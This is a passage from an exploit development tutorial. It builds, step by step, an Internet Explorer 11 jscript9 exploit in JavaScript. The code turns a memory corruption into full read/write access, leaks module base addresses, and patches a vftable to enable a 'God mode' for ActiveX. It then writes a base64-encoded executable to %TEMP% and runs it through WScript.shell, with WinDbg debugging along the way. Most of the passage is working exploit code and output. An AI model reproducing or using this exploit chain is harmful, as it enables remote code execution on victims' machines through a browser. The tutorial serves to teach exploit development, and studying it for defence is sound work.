=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 3 in the last position of one of our arr
ays. IE encodes the number x
 
    
// as 2*x+1 so that it can tell addresses (dword aligned) and numbers apart.
 
    
// Either we use an odd number or a valid address otherwise IE will crash in the
 
    
// following for loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
le
akArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leakArray
 
==
 
0
)
 
{
 
      
alert
(
"Can't find leakArray!"
);
 
      
window.location.reload
();
 
      
return
;
 
 
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3bf7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
,
 
obj
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Proj
ection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00000000 00000003
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 375 
-
 
    
//   73b38b9a 00000000 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_
addr
(
document.createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
// We want to overwrite mshtml+0xc555e0+0x14 with jscript9+0xdc164 where:
 
    
//   * mshtml+0xc555e0 is the address of the vftable we want to modify;
 
    
//   * jscript9+0
xdc164 points to the code "leave / ret 4".
 
    
// As a result, jscript9!ScriptEngine::CanObjectRun returns true.
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
    
shell
 
=
 
new
 
Active
XObject
(
"WScript.shell"
);
 
    
shell.Exec
(
'calc.exe'
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
      
// God mode off!
 
    
alert
(
"All done!"
);
 
  
})();
 
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Open it in IE and, when the alert box tells you, go in WinD
bg and set the byte at 
0c0af01b
 to 
0x20
 or the 
dword at 
0c0af018
 to 
0x20000000
. Then close the alert box and the calculator should pop up. If there is an 
error (it may happen, as we already saw), don’t worry and repeat the process.
 
Running arbitrary code
 
W
e saw how to run an executable present on the victim’s computer. Now let’s see how we can execute 
arbitrary code. The trick is to create an .exe file and then execute it. This is the code to do just that:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
// content of exe file encoded in base64.
 
  
runcalc
 
=
 
...
 
put
 
base64
 
encoded
 
exe
 
here
 
...
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
    
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
    
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
    
tStream.Ty
pe
 
=
 
2
;
       
// text
 
    
bStream.Type
 
=
 
1
;
       
// binary
 
    
tStream.Open
();
 
    
bStream.Open
();
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 376 
-
 
    
tStream.WriteText
(
data
);
 
    
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
    
tStream.CopyTo
(
bStream
);
 
    
bSt
ream.SaveToFile
(
fname
,
 
2
);
       
// 2 = overwrites file if it already exists
 
    
tStream.Close
();
 
    
bStream.Close
();
 
  
}
 
  
function
 
decode
(
b64Data
)
 
{
 
    
var
 
data
 
=
 
window.atob
(
b64Data
);
 
    
// Now data is like
 
    
//   11 00 12 00 45 00 50 00 ...
 
 
// rather than like
 
    
//   11 12 45 50 ...
 
    
// Let's fix this!
 
    
var
 
arr
 
=
 
new
 
Array
();
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
      
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
      
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
      
arr.push
(
String.fromCha
rCode
(
low
 
+
 
high
 
*
 
0x100
));
 
    
}
 
    
return
 
arr.join
(
''
);
 
  
}
 
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
  
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
  
createExe
(
fname
,
 
decode
(
runcalc
));
 
  
shell.Exec
(
fname
);
 
</script>
 
</head>
 
<bod
y>
 
</body>
 
</html>
 
 
I won’t explain the details of how this code works because I don’t think that’s very interesting.
 
First of all, let’s create a little application which open the calculator. In real life, we’d code something more 
interesting and useful, 
of course, but that’s enough for a demonstration.
 
Create a 
C/C++
 
Win32 Project
 in 
Visual Studio 2013
 with the following code:
 
C++
 
 
#include "windows.h"
 
 
int
 
CALLBACK
 
WinMain
(
 
    
_In_
  
HINSTANCE
 
hInstance
,
 
    
_In_
  
HINSTANCE
 
hPrevInstance
,
 
    
_In_
  
LPST
R
 
lpCmdLine
,
 
    
_In_
  
int
 
nCmdShow
)
 
{
 
    
WinExec
(
"calc.exe"
,
 
SW_SHOW
);
 
    
return
 
0
;
 
}
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 377 
-
 
Change the project properties as follows:
 

 
[
Release
]
 
o
 
Configuration Properties
 

 
C/C++
 

 
Code Generation
 

 
Runtime Library
: Multi
-
threaded (/MT)
 
This will make sure that the 
runtime library is statically linked (we want the exe file to be 
standalone
). Build 
the 
Release
 version and you should have a 
68
-
KB
 file. Mine is named 
runcalc.exe
.
 
Now encode 
runcalc.exe
 in 
base64
 with a little 
Python
 script:
 
Python
 
 
import
 
base64
 
 
with
 
open
(
r'c:
\
runcalc.exe'
,
 
'rb'
)
 
as
 
f
:
 
  
print
(
base64
.
b64encode
(
f
.
read
()))
 
 
Now copy and paste the encoded data into the javascript code above so that you have
 
JavaScript
 
 
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAA <snipped> AAAAAAAAAAAAAAAAAA'
;
 
 
I s
nipped the string because too long, but you can download it here: 
runcalc
.
 
Open the html file in IE and you’ll see that the calculator doesn’t pop up. To see what’s wro
ng, open the 
Developer Tools
 (
F12
), go to the 
Console tab
 and then reload the page. Here’s what we get:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 378 
-
 
 
The problem is that Micros
oft decided to disable 
ADODB.Stream
 in Internet Explorer because 
ADODB.Stream
 is intrinsically unsafe. For now, let’s reenable it by using a little utility called 
acm 
(
download
).
 
Install acm, run it and
 enable 
ADODB.Stream
 like shown in the following picture:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 379 
-
 
 
Now restart IE and open the html file again. This time the calculator wil
l pop up!
 
The problems are not over, unfortunately.
 
Download an utility called 
SimpleServer:WWW
 from here: 
link
.
 
We’re going to use it to run the html file as if it were se
rved by a
 web server
. SimpleServer is easy to 
configure. Just create a folder called 
WebDir
 on the Desktop, copy the html file into that folder, then run 
SimpleServer and select the html file like indicated in the following picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 380 
-
 
Then click on Start. Now open IE and open the page at the address 
127.0.0.1
. The calculator won’t pop up. 
Once again, use the Developer Tools to see what
’s wrong:
 
 
It seems that things work differently when we receive a page from a server.
 
Change the settings as shown in the followin
g picture:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 381 
-
 
 
Reload the page and you should see another error:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 382 
-
 
 
OK, now is time to solve all these problems. Reset all the settings in IE and disable again 
ADODB.Stream
 
with the utility acm. Here’s the full code we’re going to work on:
 
XHTML
 
 
<html>
 
<head>
 
<scrip
t
 language=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
 
//
-----------------------------------------------------
 
    
// From one
-
byte
-
write to full process space read/write
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
n
ew
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x
58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x200
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x80
)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 383 
-
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
      
// must be exactly 0x58!
 
 
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDataHead
 
    
//   0x20:  array[0] address
 
    
//   0x24:  array[1] address
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
/
/ 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98
a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
    
// Now let's find the Int32Arra
y whose length we modified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
break
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find int32array!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
// This is just an example.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
   
// The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 0000
0000 00000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
 
    
// 03c1f1d8: 70796e18 00000003 08100000 00000010 00
000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 384 
-
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c000000
 
    
// 03c1f238: ...
 
 
// We check that 
the structure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
/
4
],
 
        
vftptr2
 
=
 
int32array
[
0x60
*
2
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
3
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
2
+
0x24
)/
4
],
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
3
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
2
;
 
    
// Now we modify int32array again to gain full address space read/write access.
 
    
if
 
(
i
nt32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af000
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new length
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_ad
dr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
int32array
[
address
/
4
];
 
      
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..##
 ##.. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
function
 
write
(
address
,
 
value
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
      
int32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
 
 
// 0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 385 
-
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
        
int32array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
    
}
 
    
//
-
--------
 
    
// God mode
 
    
//
---------
 
    
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
jscript9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
// Now we need to determine the bas
e address of MSHTML. We can create an HTML
 
    
// object and write its reference to the address 0x0c0af000
-
4 which corresponds
 
    
// to the last element of one of our arrays.
 
    
// Let's find the array at 0x0c0af000
-
4.
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 3 in the last position of one of our arrays. IE encodes the number x
 
    
// as 2*x+1 so that it can tell addresses (dword aligned) and numbers apart.
 
    
// Either we use an odd number or a valid a
ddress otherwise IE will crash in the
 
    
// following for loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
leakArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leak
Array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find leakArray!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3bf7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
,
 
obj
);
 
    
}
 
    
// Back to determining the base ad
dress of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00000000 00000003
 
    
//   73b38b9a 00000000 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 386 
-
 
 
// We want to overwrite mshtml+0xc555e0+0x14 with jscript9+0xdc164 where
:
 
    
//   * mshtml+0xc555e0 is the address of the vftable we want to modify;
 
    
//   * jscript9+0xdc164 points to the code "leave / ret 4".
 
    
// As a result, jscript9!ScriptEngine::CanObjectRun returns true.
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
    
// content of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
      
tStream.
WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
       
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
bStream.SaveToFile
(
fname
,
 
2
);
       
// 2 = overwrites file if it already exists
 
      
tStream.Close
();
 
      
bStream.Close
();
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
window.atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
va
r
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
        
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
    
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
createExe
(
fname
,
 
decode
(
runcalc
));
 
    
shell.Exec
(
fname
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
      
// God mode off!
 
    
alert
(
"All
 done!"
);
 
  
})();
 
 
</script>
 
</head>
 
<body>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 387 
-
 
</body>
 
</html>
 
 
I snipped the value of 
runcalc
 because it was too long. You can download the full code from here: 
code1
.
 
Use
 SimpleServer to serve this code. Go to 
127.0.0.1
 in IE and when the dialog box pops up do what it says 
in WinDbg. Unfortunately, IE crashes here:
 
6ef82798 90              nop
 
IEFRAME!CDocObjectHost::_ScriptErr_Dlg:
 
6ef82799 8bff            mov     edi,edi
 
6ef8279b 55              push    ebp
 
6ef8279c 8bec            mov     ebp,esp
 
6ef8279e b870100000      mov     eax,1070h
 
6ef827a3 e86ee8f0ff      call    IEFRAME!_alloca_probe (6ee91016)
 
6ef827a8 a1b874376f      mov     eax,dword ptr [IEFRAME!__security_c
ookie (6f3774b8)]
 
6ef827ad 33c5            xor     eax,ebp
 
6ef827af 8945fc          mov     dword ptr [ebp
-
4],eax
 
6ef827b2 53              push    ebx
 
6ef827b3 33db            xor     ebx,ebx
 
6ef827b5 57              push    edi
 
6ef827b6 8bf9            mo
v     edi,ecx
 
6ef827b8 399e78050000    cmp     dword ptr [esi+578h],ebx ds:002b:00000578=????????   <
--------------------
 
6ef827be 0f84b8890c00    je      IEFRAME!CDocObjectHost::_ScriptErr_Dlg+0x3d (6f04b17c)
 
6ef827c4 e99d890c00      jmp     IEFRAME!CDocO
bjectHost::_ScriptErr_Dlg+0x27 (6f04b166)
 
6ef827c9 90              nop
 
6ef827ca 90              nop
 
6ef827cb 90              nop
 
6ef827cc 90              nop
 
6ef827cd 90              nop
 
IEFRAME!CDocObjectHost::_ScriptErr_CacheInfo:
 
6ef827ce 8bff          
  mov     edi,edi
 
6ef827d0 55              push    ebp
 
6ef827d1 8bec            mov     ebp,esp
 
6ef827d3 81eca8000000    sub     esp,0A8h
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 388 
-
 
6ef827d9 a1b874376f      mov     eax,dword ptr [IEFRAME!__security_cookie (6f3774b8)]
 
6ef827de 33c5            xor    
 eax,ebp
 
This might be a problem with our
 God Mode
. Let’s find out by modifying our javascript code as follows:
 
JavaScript
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God mode on!
 
    
alert
(
"bp on "
 
+
 
(
mshtml
+
0xc555e0
+
0x14
).
toString
(
16
));
 
 
We just add an alert right after the activation of the 
God Mode
. Restart IE and WinDbg and repeat the whole 
process.
 
I must admit that I get the 
Error
 message box a lot. Let’s change some values and see if things g
et better. 
Here are the changes:
 
JavaScript
 
 
<
html
>
 
<
head
>
 
<
script
 
language
=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
 
//
-----------------------------------------------------
 
    
// From one
-
byte
-
write to full process space read/write
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x300
;
 
++
i
)
 
{
           
// <
------------
 from 0x200 to 0x300
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x100
)
                       
// <
------------
 from 0x80 to 0x100
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
      
// must be exactly 0x58!
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    
0x0:  ArrayDataHead
 
    
//   0x20:  array[0] address
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 38
9 
-
 
    
//   0x24:  array[1] address
 
    
//   ...
 
    
// 0xf000:  Int32Array
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
        
// <
------------
 from 0x200 to 0x300
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Array
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20
000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArrayBuf
 
    
alert
(
"Set byte at 0c0af01b to 0x20"
);
 
    
// Now let's find the Int32Array whose length we modified.
 
    
int32arra
y
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x300
;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
       
// <
------------
 from 0x200 to 0x300
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
int32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32arr
ay
 
!=
 
0
)
 
        
break
;
 
    
}
 
 
Ah, much better! Now it’s way more stable, at least on my system.
 
Finally, the dialog box with the address of the modified entry in the vftable pops up. In my case, it says 
bp on 
6d0f55f4
. Let’s put a breakpoint on access:
 
ba
 r4 mshtml+0xc555e0+0x14
 
After we hit 
F5
 and we close the dialog, the execution stops here:
 
0555c15a 5f              pop     edi
 
0555c15b 5e              pop     esi
 
0555c15c 33cd            xor     ecx,ebp
 
0555c15e 5b              pop     ebx
 
0555c15f e8d
a51f2ff      call    jscript9!__security_check_cookie (0548133e)
 
0555c164 c9              leave         <
--------------------
 we are here
 
0555c165 c20400          ret     4
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 390 
-
 
Here’s the stack trace:
 
0:007> k 5
 
ChildEBP RetAddr  
 
03e0bbb4 0555bfae jscript9!Sc
riptEngine::CanObjectRun+0xaf
 
03e0bc00 0555bde1 jscript9!ScriptSite::CreateObjectFromProgID+0xdf
 
03e0bc44 0555bd69 jscript9!ScriptSite::CreateActiveXObject+0x56
 
03e0bc78 054c25d5 jscript9!JavascriptActiveXObject::NewInstance+0x90
 
03e0bcd0 054ccd4a jscript9
!Js::InterpreterStackFrame::NewScObject_Helper+0xd6
 
OK, we’re inside 
CreateActiveXObject
 so everything is proceeding as it should. Let’s hit 
F5
 again. Now the 
execution stops on the same instruction but the stack trace is different:
 
0:007> k 10
 
ChildEBP Re
tAddr  
 
03e0a4dc 6eeb37aa jscript9!ScriptEngine::CanObjectRun+0xaf
 
03e0b778 6eedac3e IEFRAME!CDocObjectHost::OnExec+0xf9d
 
03e0b7a8 6c9d7e9a IEFRAME!CDocObjectHost::Exec+0x23d
 
03e0b810 6c9d7cc7 MSHTML!CWindow::ShowErrorDialog+0x95
 
03e0b954 6c9d7b68 MSHTML!C
OmWindowProxy::Fire_onerror+0xc6
 
03e0bbc0 6c9d7979 MSHTML!CMarkup::ReportScriptError+0x179
 
03e0bc40 0555dbe4 MSHTML!CActiveScriptHolder::OnScriptError+0x14e
 
03e0bc50 0555e516 jscript9!ScriptEngine::OnScriptError+0x17
 
03e0bc6c 0555e4b6 jscript9!ScriptSite::
ReportError+0x56
 
03e0bc78 0555e460 jscript9!ScriptSite::HandleJavascriptException+0x1b
 
03e0c3d8 05492027 jscript9!ScriptSite::CallRootFunction+0x6d
 
03e0c400 0553df75 jscript9!ScriptSite::Execute+0x61
 
03e0c48c 0553db57 jscript9!ScriptEngine::ExecutePendingS
cripts+0x1e9
 
03e0c514 0553e0b7 jscript9!ScriptEngine::ParseScriptTextCore+0x2ad
 
03e0c568 6c74b60c jscript9!ScriptEngine::ParseScriptText+0x5b
 
03e0c5a0 6c74945d MSHTML!CActiveScriptHolder::ParseScriptText+0x42
 
After a little bit of stepping IE crashes as be
fore. It seems we have a problem with our 
God Mode
. Probably, 
our problem is that we modified the vftable itself which is used by all the objects of the same type. We 
should create a modified copy of the original vftable and make the object we’re intereste
d in point to it.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 391 
